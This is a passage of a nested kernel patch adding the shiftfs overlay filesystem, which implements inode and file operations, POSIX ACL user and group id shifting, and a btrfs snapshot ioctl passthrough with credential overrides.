++	if (!err && WARN_ON(!lowerd_new->d_inode))
++		err = -EIO;
++	if (err)
++		goto out_iput;
++
++	if (hardlink) {
++		inode = d_inode(hardlink);
++		ihold(inode);
++
++		/* copy up times from lower inode */
++		shiftfs_copyattr(d_inode(lowerd_link), inode);
++		set_nlink(d_inode(hardlink), d_inode(lowerd_link)->i_nlink);
++		d_instantiate(dentry, inode);
++	} else {
++		struct inode *inode_tmp;
++		struct inode *loweri_new = d_inode(lowerd_new);
++
++		inode_tmp = inode_insert5(inode, (unsigned long)loweri_new,
++					  shiftfs_inode_test, shiftfs_inode_set,
++					  loweri_new);
++		if (unlikely(inode_tmp != inode)) {
++			pr_err_ratelimited("shiftfs: newly created inode found in cache\n");
++			iput(inode_tmp);
++			err = -EINVAL;
++			goto out_iput;
++		}
++
++		ihold(loweri_new);
++		shiftfs_fill_inode(inode, loweri_new->i_ino, loweri_new->i_mode,
++				   0, lowerd_new);
++		d_instantiate_new(dentry, inode);
++	}
++
++	shiftfs_copyattr(loweri_dir, diri);
++	if (loweri_iop_ptr == loweri_dir_iop->mkdir)
++		set_nlink(diri, loweri_dir->i_nlink);
++
++	inode = NULL;
++
++out_iput:
++	iput(inode);
++	inode_unlock(loweri_dir);
++
++	return err;
++}
++
++static int shiftfs_create(struct user_namespace *ns,
++			  struct inode *dir, struct dentry *dentry,
++			  umode_t mode,  bool excl)
++{
++	mode |= S_IFREG;
++
++	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, excl);
++}
++
++static int shiftfs_mkdir(struct user_namespace *ns, struct inode *dir, struct dentry *dentry,
++			 umode_t mode)
++{
++	mode |= S_IFDIR;
++
++	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
++}
++
++static int shiftfs_link(struct dentry *hardlink, struct inode *dir,
++			struct dentry *dentry)
++{
++	return shiftfs_create_object(dir, dentry, 0, NULL, hardlink, false);
++}
++
++static int shiftfs_mknod(struct user_namespace *ns,
++			 struct inode *dir, struct dentry *dentry, umode_t mode,
++			 dev_t rdev)
++{
++	if (!S_ISFIFO(mode) && !S_ISSOCK(mode))
++		return -EPERM;
++
++	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
++}
++
++static int shiftfs_symlink(struct user_namespace *ns, struct inode *dir, struct dentry *dentry,
++			   const char *symlink)
++{
++	return shiftfs_create_object(dir, dentry, S_IFLNK, symlink, NULL, false);
++}
++
++static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
++{
++	struct dentry *lowerd = dentry->d_fsdata;
++	struct inode *loweri = dir->i_private;
++	struct inode *inode = d_inode(dentry);
++	int err;
++	const struct cred *oldcred;
++
++	dget(lowerd);
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	inode_lock_nested(loweri, I_MUTEX_PARENT);
++	if (rmdir)
++		err = vfs_rmdir(&init_user_ns, loweri, lowerd);
++	else
++		err = vfs_unlink(&init_user_ns, loweri, lowerd, NULL);
++	revert_creds(oldcred);
++
++	if (!err) {
++		d_drop(dentry);
++
++		if (rmdir)
++			clear_nlink(inode);
++		else
++			drop_nlink(inode);
++	}
++	inode_unlock(loweri);
++
++	shiftfs_copyattr(loweri, dir);
++	dput(lowerd);
++
++	return err;
++}
++
++static int shiftfs_unlink(struct inode *dir, struct dentry *dentry)
++{
++	return shiftfs_rm(dir, dentry, false);
++}
++
++static int shiftfs_rmdir(struct inode *dir, struct dentry *dentry)
++{
++	return shiftfs_rm(dir, dentry, true);
++}
++
++static int shiftfs_rename(struct user_namespace *ns,
++			  struct inode *olddir, struct dentry *old,
++			  struct inode *newdir, struct dentry *new,
++			  unsigned int flags)
++{
++	struct dentry *lowerd_dir_old = old->d_parent->d_fsdata,
++		      *lowerd_dir_new = new->d_parent->d_fsdata,
++		      *lowerd_old = old->d_fsdata, *lowerd_new = new->d_fsdata,
++		      *trapd;
++	struct inode *loweri_dir_old = lowerd_dir_old->d_inode,
++		     *loweri_dir_new = lowerd_dir_new->d_inode;
++	struct renamedata rd = {
++		.old_mnt_userns	= &init_user_ns,
++		.old_dir	= loweri_dir_old,
++		.old_dentry	= lowerd_old,
++		.new_mnt_userns	= &init_user_ns,
++		.new_dir	= loweri_dir_new,
++		.new_dentry	= lowerd_new,
++	};
++	int err = -EINVAL;
++	const struct cred *oldcred;
++
++	trapd = lock_rename(lowerd_dir_new, lowerd_dir_old);
++
++	if (trapd == lowerd_old || trapd == lowerd_new)
++		goto out_unlock;
++
++	oldcred = shiftfs_override_creds(old->d_sb);
++	err = vfs_rename(&rd);
++	revert_creds(oldcred);
++
++	shiftfs_copyattr(loweri_dir_old, olddir);
++	shiftfs_copyattr(loweri_dir_new, newdir);
++
++out_unlock:
++	unlock_rename(lowerd_dir_new, lowerd_dir_old);
++
++	return err;
++}
++
++static struct dentry *shiftfs_lookup(struct inode *dir, struct dentry *dentry,
++				     unsigned int flags)
++{
++	struct dentry *new;
++	struct inode *newi;
++	const struct cred *oldcred;
++	struct dentry *lowerd = dentry->d_parent->d_fsdata;
++	struct inode *inode = NULL, *loweri = lowerd->d_inode;
++
++	inode_lock(loweri);
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	new = lookup_one_len(dentry->d_name.name, lowerd, dentry->d_name.len);
++	revert_creds(oldcred);
++	inode_unlock(loweri);
++
++	if (IS_ERR(new))
++		return new;
++
++	dentry->d_fsdata = new;
++
++	newi = new->d_inode;
++	if (!newi)
++		goto out;
++
++	inode = iget5_locked(dentry->d_sb, (unsigned long)newi,
++			     shiftfs_inode_test, shiftfs_inode_set, newi);
++	if (!inode) {
++		dput(new);
++		return ERR_PTR(-ENOMEM);
++	}
++	if (inode->i_state & I_NEW) {
++		/*
++		 * inode->i_private set by shiftfs_inode_set(), but we still
++		 * need to take a reference
++		*/
++		ihold(newi);
++		shiftfs_fill_inode(inode, newi->i_ino, newi->i_mode, 0, new);
++		unlock_new_inode(inode);
++	}
++
++out:
++	return d_splice_alias(inode, dentry);
++}
++
++static int shiftfs_permission(struct user_namespace *ns, struct inode *inode, int mask)
++{
++	int err;
++	const struct cred *oldcred;
++	struct inode *loweri = inode->i_private;
++
++	if (!loweri) {
++		WARN_ON(!(mask & MAY_NOT_BLOCK));
++		return -ECHILD;
++	}
++
++	err = generic_permission(&init_user_ns, inode, mask);
++	if (err)
++		return err;
++
++	oldcred = shiftfs_override_creds(inode->i_sb);
++	err = inode_permission(&init_user_ns, loweri, mask);
++	revert_creds(oldcred);
++
++	return err;
++}
++
++static int shiftfs_fiemap(struct inode *inode,
++			  struct fiemap_extent_info *fieinfo, u64 start,
++			  u64 len)
++{
++	int err;
++	const struct cred *oldcred;
++	struct inode *loweri = inode->i_private;
++
++	if (!loweri->i_op->fiemap)
++		return -EOPNOTSUPP;
++
++	oldcred = shiftfs_override_creds(inode->i_sb);
++	if (fieinfo->fi_flags & FIEMAP_FLAG_SYNC)
++		filemap_write_and_wait(loweri->i_mapping);
++	err = loweri->i_op->fiemap(loweri, fieinfo, start, len);
++	revert_creds(oldcred);
++
++	return err;
++}
++
++static int shiftfs_tmpfile(struct user_namespace *ns,
++			   struct inode *dir, struct file *file,
++			   umode_t mode)
++{
++	int err;
++	const struct cred *oldcred;
++	struct inode *loweri = dir->i_private;
++
++	if (!loweri->i_op->tmpfile)
++		return -EOPNOTSUPP;
++
++	oldcred = shiftfs_override_creds(dir->i_sb);
++	err = loweri->i_op->tmpfile(&init_user_ns, loweri, file, mode);
++	revert_creds(oldcred);
++
++	return err;
++}
++
++static int shiftfs_setattr(struct user_namespace *ns, struct dentry *dentry, struct iattr *attr)
++{
++	struct dentry *lowerd = dentry->d_fsdata;
++	struct inode *loweri = lowerd->d_inode;
++	struct iattr newattr;
++	const struct cred *oldcred;
++	struct super_block *sb = dentry->d_sb;
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
++	int err;
++
++	err = setattr_prepare(&init_user_ns, dentry, attr);
++	if (err)
++		return err;
++
++	newattr = *attr;
++	newattr.ia_uid = shift_kuid(sb->s_user_ns, sbinfo->userns, attr->ia_uid);
++	newattr.ia_gid = shift_kgid(sb->s_user_ns, sbinfo->userns, attr->ia_gid);
++
++	/*
++	 * mode change is for clearing setuid/setgid bits. Allow lower fs
++	 * to interpret this in its own way.
++	 */
++	if (newattr.ia_valid & (ATTR_KILL_SUID|ATTR_KILL_SGID))
++		newattr.ia_valid &= ~ATTR_MODE;
++
++	inode_lock(loweri);
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	err = notify_change(&init_user_ns, lowerd, &newattr, NULL);
++	revert_creds(oldcred);
++	inode_unlock(loweri);
++
++	shiftfs_copyattr(loweri, d_inode(dentry));
++
++	return err;
++}
++
++static int shiftfs_getattr(struct user_namespace *ns,
++			   const struct path *path, struct kstat *stat,
++			   u32 request_mask, unsigned int query_flags)
++{
++	struct inode *inode = path->dentry->d_inode;
++	struct dentry *lowerd = path->dentry->d_fsdata;
++	struct inode *loweri = lowerd->d_inode;
++	struct shiftfs_super_info *info = path->dentry->d_sb->s_fs_info;
++	struct path newpath = { .mnt = info->mnt, .dentry = lowerd };
++	struct user_namespace *from_ns = loweri->i_sb->s_user_ns;
++	struct user_namespace *to_ns = inode->i_sb->s_user_ns;
++	const struct cred *oldcred;
++	int err;
++
++	oldcred = shiftfs_override_creds(inode->i_sb);
++	err = vfs_getattr(&newpath, stat, request_mask, query_flags);
++	revert_creds(oldcred);
++
++	if (err)
++		return err;
++
++	/* transform the underlying id */
++	stat->uid = shift_kuid(from_ns, to_ns, stat->uid);
++	stat->gid = shift_kgid(from_ns, to_ns, stat->gid);
++	return 0;
++}
++
++#ifdef CONFIG_SHIFT_FS_POSIX_ACL
++
++static int
++shift_acl_ids(struct user_namespace *from, struct user_namespace *to,
++	      struct posix_acl *acl)
++{
++	int i;
++
++	for (i = 0; i < acl->a_count; i++) {
++		struct posix_acl_entry *e = &acl->a_entries[i];
++		switch(e->e_tag) {
++		case ACL_USER:
++			e->e_uid = shift_kuid(from, to, e->e_uid);
++			if (!uid_valid(e->e_uid))
++				return -EOVERFLOW;
++			break;
++		case ACL_GROUP:
++			e->e_gid = shift_kgid(from, to, e->e_gid);
++			if (!gid_valid(e->e_gid))
++				return -EOVERFLOW;
++			break;
++		}
++	}
++	return 0;
++}
++
++static void
++shift_acl_xattr_ids(struct user_namespace *from, struct user_namespace *to,
++		    void *value, size_t size)
++{
++	struct posix_acl_xattr_header *header = value;
++	struct posix_acl_xattr_entry *entry = (void *)(header + 1), *end;
++	int count;
++	kuid_t kuid;
++	kgid_t kgid;
++
++	if (!value)
++		return;
++	if (size < sizeof(struct posix_acl_xattr_header))
++		return;
++	if (header->a_version != cpu_to_le32(POSIX_ACL_XATTR_VERSION))
++		return;
++
++	count = posix_acl_xattr_count(size);
++	if (count < 0)
++		return;
++	if (count == 0)
++		return;
++
++	for (end = entry + count; entry != end; entry++) {
++		switch(le16_to_cpu(entry->e_tag)) {
++		case ACL_USER:
++			kuid = make_kuid(&init_user_ns, le32_to_cpu(entry->e_id));
++			kuid = shift_kuid(from, to, kuid);
++			entry->e_id = cpu_to_le32(from_kuid(&init_user_ns, kuid));
++			break;
++		case ACL_GROUP:
++			kgid = make_kgid(from, le32_to_cpu(entry->e_id));
++			kgid = shift_kgid(from, to, kgid);
++			entry->e_id = cpu_to_le32(from_kgid(from, kgid));
++			break;
++		default:
++			break;
++		}
++	}
++}
++
++static struct posix_acl *
++shiftfs_get_acl(struct inode *inode, int type, bool rcu)
++{
++	struct inode *loweri = inode->i_private;
++	const struct cred *oldcred;
++	struct posix_acl *lower_acl, *acl = NULL;
++	struct user_namespace *from_ns = loweri->i_sb->s_user_ns;
++	struct user_namespace *to_ns = inode->i_sb->s_user_ns;
++	int size;
++	int err;
++
++	if (rcu)
++		return ERR_PTR(-ECHILD);
++
++	if (!IS_POSIXACL(loweri))
++		return NULL;
++
++	oldcred = shiftfs_override_creds(inode->i_sb);
++	lower_acl = get_acl(loweri, type);
++	revert_creds(oldcred);
++
++	if (lower_acl && !IS_ERR(lower_acl)) {
++		/* XXX: export posix_acl_clone? */
++		size = sizeof(struct posix_acl) +
++		       lower_acl->a_count * sizeof(struct posix_acl_entry);
++		acl = kmemdup(lower_acl, size, GFP_KERNEL);
++		posix_acl_release(lower_acl);
++
++		if (!acl)
++			return ERR_PTR(-ENOMEM);
++
++		refcount_set(&acl->a_refcount, 1);
++
++		err = shift_acl_ids(from_ns, to_ns, acl);
++		if (err) {
++			kfree(acl);
++			return ERR_PTR(err);
++		}
++	}
++
++	return acl;
++}
++
++static int
++shiftfs_posix_acl_xattr_get(const struct xattr_handler *handler,
++			   struct dentry *dentry, struct inode *inode,
++			   const char *name, void *buffer, size_t size)
++{
++	struct inode *loweri = inode->i_private;
++	int ret;
++
++	ret = shiftfs_xattr_get(NULL, dentry, inode, handler->name,
++				buffer, size);
++	if (ret < 0)
++		return ret;
++
++	inode_lock(loweri);
++	shift_acl_xattr_ids(loweri->i_sb->s_user_ns, inode->i_sb->s_user_ns,
++			    buffer, size);
++	inode_unlock(loweri);
++	return ret;
++}
++
++static int
++shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
++			    struct user_namespace *ns,
++			    struct dentry *dentry, struct inode *inode,
++			    const char *name, const void *value,
++			    size_t size, int flags)
++{
++	struct inode *loweri = inode->i_private;
++	int err;
++
++	if (!IS_POSIXACL(loweri) || !loweri->i_op->set_acl)
++		return -EOPNOTSUPP;
++	if (handler->flags == ACL_TYPE_DEFAULT && !S_ISDIR(inode->i_mode))
++		return value ? -EACCES : 0;
++	if (!inode_owner_or_capable(&init_user_ns, inode))
++		return -EPERM;
++
++	if (value) {
++		shift_acl_xattr_ids(inode->i_sb->s_user_ns,
++				    loweri->i_sb->s_user_ns,
++				    (void *)value, size);
++		err = shiftfs_setxattr(dentry, inode, handler->name, value,
++				       size, flags);
++	} else {
++		err = shiftfs_removexattr(&init_user_ns, dentry, handler->name);
++	}
++
++	if (!err)
++		shiftfs_copyattr(loweri, inode);
++
++	return err;
++}
++
++static const struct xattr_handler
++shiftfs_posix_acl_access_xattr_handler = {
++	.name = XATTR_NAME_POSIX_ACL_ACCESS,
++	.flags = ACL_TYPE_ACCESS,
++	.get = shiftfs_posix_acl_xattr_get,
++	.set = shiftfs_posix_acl_xattr_set,
++};
++
++static const struct xattr_handler
++shiftfs_posix_acl_default_xattr_handler = {
++	.name = XATTR_NAME_POSIX_ACL_DEFAULT,
++	.flags = ACL_TYPE_DEFAULT,
++	.get = shiftfs_posix_acl_xattr_get,
++	.set = shiftfs_posix_acl_xattr_set,
++};
++
++#else /* !CONFIG_SHIFT_FS_POSIX_ACL */
++
++#define shiftfs_get_acl NULL
++
++#endif /* CONFIG_SHIFT_FS_POSIX_ACL */
++
++static const struct inode_operations shiftfs_dir_inode_operations = {
++	.lookup		= shiftfs_lookup,
++	.mkdir		= shiftfs_mkdir,
++	.symlink	= shiftfs_symlink,
++	.unlink		= shiftfs_unlink,
++	.rmdir		= shiftfs_rmdir,
++	.rename		= shiftfs_rename,
++	.link		= shiftfs_link,
++	.setattr	= shiftfs_setattr,
++	.create		= shiftfs_create,
++	.mknod		= shiftfs_mknod,
++	.permission	= shiftfs_permission,
++	.getattr	= shiftfs_getattr,
++	.listxattr	= shiftfs_listxattr,
++	.get_acl	= shiftfs_get_acl,
++};
++
++static const struct inode_operations shiftfs_file_inode_operations = {
++	.fiemap		= shiftfs_fiemap,
++	.getattr	= shiftfs_getattr,
++	.get_acl	= shiftfs_get_acl,
++	.listxattr	= shiftfs_listxattr,
++	.permission	= shiftfs_permission,
++	.setattr	= shiftfs_setattr,
++	.tmpfile	= shiftfs_tmpfile,
++};
++
++static const struct inode_operations shiftfs_special_inode_operations = {
++	.getattr	= shiftfs_getattr,
++	.get_acl	= shiftfs_get_acl,
++	.listxattr	= shiftfs_listxattr,
++	.permission	= shiftfs_permission,
++	.setattr	= shiftfs_setattr,
++};
++
++static const struct inode_operations shiftfs_symlink_inode_operations = {
++	.getattr	= shiftfs_getattr,
++	.get_link	= shiftfs_get_link,
++	.listxattr	= shiftfs_listxattr,
++	.setattr	= shiftfs_setattr,
++};
++
++static struct file *shiftfs_open_realfile(const struct file *file,
++					  struct inode *realinode)
++{
++	struct file *realfile;
++	const struct cred *old_cred;
++	struct inode *inode = file_inode(file);
++	struct dentry *lowerd = file->f_path.dentry->d_fsdata;
++	struct shiftfs_super_info *info = inode->i_sb->s_fs_info;
++	struct path realpath = { .mnt = info->mnt, .dentry = lowerd };
++
++	old_cred = shiftfs_override_creds(inode->i_sb);
++	realfile = open_with_fake_path(&realpath, file->f_flags, realinode,
++				       info->creator_cred);
++	revert_creds(old_cred);
++
++	return realfile;
++}
++
++#define SHIFTFS_SETFL_MASK (O_APPEND | O_NONBLOCK | O_NDELAY | O_DIRECT)
++
++static int shiftfs_change_flags(struct file *file, unsigned int flags)
++{
++	struct inode *inode = file_inode(file);
++	int err;
++
++	/* if some flag changed that cannot be changed then something's amiss */
++	if (WARN_ON((file->f_flags ^ flags) & ~SHIFTFS_SETFL_MASK))
++		return -EIO;
++
++	flags &= SHIFTFS_SETFL_MASK;
++
++	if (((flags ^ file->f_flags) & O_APPEND) && IS_APPEND(inode))
++		return -EPERM;
++
++	if (flags & O_DIRECT) {
++		if (!file->f_mapping->a_ops ||
++		    !file->f_mapping->a_ops->direct_IO)
++			return -EINVAL;
++	}
++
++	if (file->f_op->check_flags) {
++		err = file->f_op->check_flags(flags);
++		if (err)
++			return err;
++	}
++
++	spin_lock(&file->f_lock);
++	file->f_flags = (file->f_flags & ~SHIFTFS_SETFL_MASK) | flags;
++	spin_unlock(&file->f_lock);
++
++	return 0;
++}
++
++static int shiftfs_open(struct inode *inode, struct file *file)
++{
++	struct file *realfile;
++
++	realfile = shiftfs_open_realfile(file, inode->i_private);
++	if (IS_ERR(realfile))
++		return PTR_ERR(realfile);
++
++	file->private_data = realfile;
++	/* For O_DIRECT dentry_open() checks f_mapping->a_ops->direct_IO. */
++	file->f_mapping = realfile->f_mapping;
++
++	return 0;
++}
++
++static int shiftfs_dir_open(struct inode *inode, struct file *file)
++{
++	struct file *realfile;
++	const struct cred *oldcred;
++	struct dentry *lowerd = file->f_path.dentry->d_fsdata;
++	struct shiftfs_super_info *info = inode->i_sb->s_fs_info;
++	struct path realpath = { .mnt = info->mnt, .dentry = lowerd };
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	realfile = dentry_open(&realpath, file->f_flags | O_NOATIME,
++			       info->creator_cred);
++	revert_creds(oldcred);
++	if (IS_ERR(realfile))
++		return PTR_ERR(realfile);
++
++	file->private_data = realfile;
++
++	return 0;
++}
++
++static int shiftfs_release(struct inode *inode, struct file *file)
++{
++	struct file *realfile = file->private_data;
++
++	if (realfile)
++		fput(realfile);
++
++	return 0;
++}
++
++static int shiftfs_dir_release(struct inode *inode, struct file *file)
++{
++	return shiftfs_release(inode, file);
++}
++
++static loff_t shiftfs_dir_llseek(struct file *file, loff_t offset, int whence)
++{
++	struct file *realfile = file->private_data;
++
++	return vfs_llseek(realfile, offset, whence);
++}
++
++static loff_t shiftfs_file_llseek(struct file *file, loff_t offset, int whence)
++{
++	struct inode *realinode = file_inode(file)->i_private;
++
++	return generic_file_llseek_size(file, offset, whence,
++					realinode->i_sb->s_maxbytes,
++					i_size_read(realinode));
++}
++
++/* XXX: Need to figure out what to to about atime updates, maybe other
++ * timestamps too ... ref. ovl_file_accessed() */
++
++static rwf_t shiftfs_iocb_to_rwf(struct kiocb *iocb)
++{
++	int ifl = iocb->ki_flags;
++	rwf_t flags = 0;
++
++	if (ifl & IOCB_NOWAIT)
++		flags |= RWF_NOWAIT;
++	if (ifl & IOCB_HIPRI)
++		flags |= RWF_HIPRI;
++	if (ifl & IOCB_DSYNC)
++		flags |= RWF_DSYNC;
++	if (ifl & IOCB_SYNC)
++		flags |= RWF_SYNC;
++
++	return flags;
++}
++
++static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
++{
++	struct file *realfile;
++
++	if (file->f_op->open != shiftfs_open &&
++	    file->f_op->open != shiftfs_dir_open)
++		return -EINVAL;
++
++	realfile = file->private_data;
++	lowerfd->flags = 0;
++	lowerfd->file = realfile;
++
++	/* Did the flags change since open? */
++	if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
++		return shiftfs_change_flags(lowerfd->file, file->f_flags);
++
++	return 0;
++}
++
++static ssize_t shiftfs_read_iter(struct kiocb *iocb, struct iov_iter *iter)
++{
++	struct file *file = iocb->ki_filp;
++	struct fd lowerfd;
++	const struct cred *oldcred;
++	ssize_t ret;
++
++	if (!iov_iter_count(iter))
++		return 0;
++
++	ret = shiftfs_real_fdget(file, &lowerfd);
++	if (ret)
++		return ret;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	ret = vfs_iter_read(lowerfd.file, iter, &iocb->ki_pos,
++			    shiftfs_iocb_to_rwf(iocb));
++	revert_creds(oldcred);
++
++	shiftfs_file_accessed(file);
++
++	fdput(lowerfd);
++	return ret;
++}
++
++static ssize_t shiftfs_write_iter(struct kiocb *iocb, struct iov_iter *iter)
++{
++	struct file *file = iocb->ki_filp;
++	struct inode *inode = file_inode(file);
++	struct fd lowerfd;
++	const struct cred *oldcred;
++	ssize_t ret;
++
++	if (!iov_iter_count(iter))
++		return 0;
++
++	inode_lock(inode);
++	/* Update mode */
++	shiftfs_copyattr(inode->i_private, inode);
++	ret = file_remove_privs(file);
++	if (ret)
++		goto out_unlock;
++
++	ret = shiftfs_real_fdget(file, &lowerfd);
++	if (ret)
++		goto out_unlock;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	file_start_write(lowerfd.file);
++	ret = vfs_iter_write(lowerfd.file, iter, &iocb->ki_pos,
++			     shiftfs_iocb_to_rwf(iocb));
++	file_end_write(lowerfd.file);
++	revert_creds(oldcred);
++
++	/* Update size */
++	shiftfs_copyattr(inode->i_private, inode);
++
++	fdput(lowerfd);
++
++out_unlock:
++	inode_unlock(inode);
++	return ret;
++}
++
++static int shiftfs_fsync(struct file *file, loff_t start, loff_t end,
++			 int datasync)
++{
++	struct fd lowerfd;
++	const struct cred *oldcred;
++	int ret;
++
++	ret = shiftfs_real_fdget(file, &lowerfd);
++	if (ret)
++		return ret;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	ret = vfs_fsync_range(lowerfd.file, start, end, datasync);
++	revert_creds(oldcred);
++
++	fdput(lowerfd);
++	return ret;
++}
++
++static int shiftfs_mmap(struct file *file, struct vm_area_struct *vma)
++{
++	struct file *realfile = file->private_data;
++	const struct cred *oldcred;
++	int ret;
++
++	if (!realfile->f_op->mmap)
++		return -ENODEV;
++
++	if (WARN_ON(file != vma->vm_file))
++		return -EIO;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	vma->vm_file = get_file(realfile);
++	ret = call_mmap(vma->vm_file, vma);
++	revert_creds(oldcred);
++
++	shiftfs_file_accessed(file);
++
++	if (ret) {
++		/*
++		 * Drop refcount from new vm_file value and restore original
++		 * vm_file value
++		 */
++		vma->vm_file = file;
++		fput(realfile);
++	} else {
++		/* Drop refcount from previous vm_file value */
++		fput(file);
++	}
++
++	return ret;
++}
++
++static long shiftfs_fallocate(struct file *file, int mode, loff_t offset,
++			      loff_t len)
++{
++	struct inode *inode = file_inode(file);
++	struct inode *loweri = inode->i_private;
++	struct fd lowerfd;
++	const struct cred *oldcred;
++	int ret;
++
++	ret = shiftfs_real_fdget(file, &lowerfd);
++	if (ret)
++		return ret;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	ret = vfs_fallocate(lowerfd.file, mode, offset, len);
++	revert_creds(oldcred);
++
++	/* Update size */
++	shiftfs_copyattr(loweri, inode);
++
++	fdput(lowerfd);
++	return ret;
++}
++
++static int shiftfs_fadvise(struct file *file, loff_t offset, loff_t len,
++			   int advice)
++{
++	struct fd lowerfd;
++	const struct cred *oldcred;
++	int ret;
++
++	ret = shiftfs_real_fdget(file, &lowerfd);
++	if (ret)
++		return ret;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	ret = vfs_fadvise(lowerfd.file, offset, len, advice);
++	revert_creds(oldcred);
++
++	fdput(lowerfd);
++	return ret;
++}
++
++static int shiftfs_override_ioctl_creds(int cmd, const struct super_block *sb,
++					const struct cred **oldcred,
++					struct cred **newcred)
++{
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
++	kuid_t fsuid = current_fsuid();
++	kgid_t fsgid = current_fsgid();
++
++	*oldcred = shiftfs_override_creds(sb);
++
++	*newcred = prepare_creds();
++	if (!*newcred) {
++		revert_creds(*oldcred);
++		return -ENOMEM;
++	}
++
++	(*newcred)->fsuid = shift_kuid(sb->s_user_ns, sbinfo->userns, fsuid);
++	(*newcred)->fsgid = shift_kgid(sb->s_user_ns, sbinfo->userns, fsgid);
++
++	/* clear all caps to prevent bypassing capable() checks */
++	cap_clear((*newcred)->cap_bset);
++	cap_clear((*newcred)->cap_effective);
++	cap_clear((*newcred)->cap_inheritable);
++	cap_clear((*newcred)->cap_permitted);
++
++	if (cmd == BTRFS_IOC_SNAP_DESTROY) {
++		kuid_t kuid_root = make_kuid(sb->s_user_ns, 0);
++		/*
++		 * Allow the root user in the container to remove subvolumes
++		 * from other users.
++		 */
++		if (uid_valid(kuid_root) && uid_eq(fsuid, kuid_root))
++			cap_raise((*newcred)->cap_effective, CAP_DAC_OVERRIDE);
++	}
++
++	put_cred(override_creds(*newcred));
++	return 0;
++}
++
++static inline void shiftfs_revert_ioctl_creds(const struct cred *oldcred,
++					      struct cred *newcred)
++{
++	return shiftfs_revert_object_creds(oldcred, newcred);
++}
++
++static inline bool is_btrfs_snap_ioctl(int cmd)
++{
++	if ((cmd == BTRFS_IOC_SNAP_CREATE) || (cmd == BTRFS_IOC_SNAP_CREATE_V2))
++		return true;
++
++	return false;
++}
++
++static int shiftfs_btrfs_ioctl_fd_restore(int cmd, int fd, void __user *arg,
++					  struct btrfs_ioctl_vol_args *v1,
++					  struct btrfs_ioctl_vol_args_v2 *v2)
++{
++	int ret;
++
++	if (!is_btrfs_snap_ioctl(cmd))
++		return 0;
++
++	if (cmd == BTRFS_IOC_SNAP_CREATE)
++		ret = copy_to_user(arg, v1, sizeof(*v1));
++	else
++		ret = copy_to_user(arg, v2, sizeof(*v2));
++
++	close_fd(fd);
++	kfree(v1);
++	kfree(v2);
++
++	return ret ? -EFAULT: 0;
++}
++
++static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
++					  struct btrfs_ioctl_vol_args **b1,
++					  struct btrfs_ioctl_vol_args_v2 **b2,
++					  int *newfd)
++{
++	int oldfd, ret;
++	struct fd src;
++	struct fd lfd = {};
++	struct btrfs_ioctl_vol_args *v1 = NULL;
++	struct btrfs_ioctl_vol_args_v2 *v2 = NULL;
++
++	*b1 = NULL;
++	*b2 = NULL;
++
++	if (!is_btrfs_snap_ioctl(cmd))
++		return 0;
++
++	if (cmd == BTRFS_IOC_SNAP_CREATE) {
++		v1 = memdup_user(arg, sizeof(*v1));
++		if (IS_ERR(v1))
++			return PTR_ERR(v1);
++		oldfd = v1->fd;
++	} else {
++		v2 = memdup_user(arg, sizeof(*v2));
++		if (IS_ERR(v2))
++			return PTR_ERR(v2);
++		oldfd = v2->fd;
++	}
++
++	src = fdget(oldfd);
++	if (!src.file) {
++		ret = -EINVAL;
++		goto err_free;
++	}
++
++	ret = shiftfs_real_fdget(src.file, &lfd);
++	if (ret) {
++		fdput(src);
++		goto err_free;
++	}
++
++	/*
++	 * shiftfs_real_fdget() does not take a reference to lfd.file, so
++	 * take a reference here to offset the one which will be put by
++	 * close_fd(), and make sure that reference is put on fdput(lfd).
++	 */
++	get_file(lfd.file);
++	lfd.flags |= FDPUT_FPUT;
++	fdput(src);
++
++	*newfd = get_unused_fd_flags(lfd.file->f_flags);
++	if (*newfd < 0) {
++		fdput(lfd);
++		ret = *newfd;
++		goto err_free;
++	}
++
++	fd_install(*newfd, lfd.file);
++
++	if (cmd == BTRFS_IOC_SNAP_CREATE) {
++		v1->fd = *newfd;
++		ret = copy_to_user(arg, v1, sizeof(*v1));
++		v1->fd = oldfd;
++	} else {
++		v2->fd = *newfd;
++		ret = copy_to_user(arg, v2, sizeof(*v2));
++		v2->fd = oldfd;
++	}
++
++	if (!ret) {
++		*b1 = v1;
++		*b2 = v2;
++	} else {
++		shiftfs_btrfs_ioctl_fd_restore(cmd, *newfd, arg, v1, v2);
++		ret = -EFAULT;
++	}
++
++	return ret;
++
++err_free:
++	kfree(v1);
++	kfree(v2);
++
++	return ret;
++}
++
++static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
++			       unsigned long arg)
++{
++	struct fd lowerfd;
++	struct cred *newcred;
++	const struct cred *oldcred;
++	int newfd = -EBADF;
++	long err = 0, ret = 0;
++	void __user *argp = (void __user *)arg;
++	struct super_block *sb = file->f_path.dentry->d_sb;
++	struct btrfs_ioctl_vol_args *btrfs_v1 = NULL;
++	struct btrfs_ioctl_vol_args_v2 *btrfs_v2 = NULL;
++
++	ret = shiftfs_btrfs_ioctl_fd_replace(cmd, argp, &btrfs_v1, &btrfs_v2,
++					     &newfd);
++	if (ret < 0)
++		return ret;
++
++	ret = shiftfs_real_fdget(file, &lowerfd);
++	if (ret)
++		goto out_restore;
++
++	ret = shiftfs_override_ioctl_creds(cmd, sb, &oldcred, &newcred);
++	if (ret)
++		goto out_fdput;
++
++	ret = vfs_ioctl(lowerfd.file, cmd, arg);
++
++	shiftfs_revert_ioctl_creds(oldcred, newcred);
++
